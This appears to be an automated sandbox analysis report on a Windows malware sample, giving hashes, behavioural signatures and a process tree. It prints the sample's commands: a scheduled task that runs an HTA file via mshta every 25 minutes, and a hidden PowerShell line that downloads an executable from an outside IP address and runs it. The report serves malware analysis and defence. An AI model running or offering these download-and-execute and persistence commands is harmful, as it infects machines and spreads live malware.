Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-02-2025 15:13
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-en
General
-
Target
random.exe
-
Size
938KB
-
MD5
35175480aaf58a493e68cb0adc722d8b
-
SHA1
2b59ac7beda4cab50a10b0ea9a787c33151cd723
-
SHA256
2e5e065dd96bc73491747ef2163358f9d8dd21a09f828d3d83adc5cb9a5ddafd
-
SHA512
18b54f47363bd68636b2bab867226dca0233bceada0c06cc32487a1adcf28dc6003490fe1fe77d2ad25a876a36f0c589d5597b13dd4d1a3182ab6cb68f91f29d
-
SSDEEP
24576:QqDEvCTbMWu7rQYlBQcBiT6rprG8aejl:QTvC/MTQYxsWR7aej
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2772 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 2772 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2356 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2228 random.exe 2228 random.exe 2228 random.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2228 random.exe 2228 random.exe 2228 random.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2228 wrote to memory of 1628 2228 random.exe 28 PID 2228 wrote to memory of 1628 2228 random.exe 28 PID 2228 wrote to memory of 1628 2228 random.exe 28 PID 2228 wrote to memory of 1628 2228 random.exe 28 PID 2228 wrote to memory of 2900 2228 random.exe 29 PID 2228 wrote to memory of 2900 2228 random.exe 29 PID 2228 wrote to memory of 2900 2228 random.exe 29 PID 2228 wrote to memory of 2900 2228 random.exe 29 PID 1628 wrote to memory of 2356 1628 cmd.exe 31 PID 1628 wrote to memory of 2356 1628 cmd.exe 31 PID 1628 wrote to memory of 2356 1628 cmd.exe 31 PID 1628 wrote to memory of 2356 1628 cmd.exe 31 PID 2900 wrote to memory of 2772 2900 mshta.exe 32 PID 2900 wrote to memory of 2772 2900 mshta.exe 32 PID 2900 wrote to memory of 2772 2900 mshta.exe 32 PID 2900 wrote to memory of 2772 2900 mshta.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ZZnblma67yt /tr "mshta C:\Users\Admin\AppData\Local\Temp\YiwPqh48H.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ZZnblma67yt /tr "mshta C:\Users\Admin\AppData\Local\Temp\YiwPqh48H.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2356
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\YiwPqh48H.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T9HNCV4E6WBQVSR6YNSHFUEL7DZ01DXU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
726B
MD5cd7361028765377852b542abfa1ea516
SHA1f77f0936df1f33543e0b384f84cb28b2dc96dec2
SHA256b0da87284876e795854fa9d2c5f04aaeaa31c643ba8ef11e827cbecbb703ceaa
SHA512ebb41907a8973dcbc627985d073d411c2265eb1cda2bb32922a1d2368fe6d3ae19393249fdf40fec6cf24f438bfb94135909d2cb80c70afcd13aedba6e39b2c8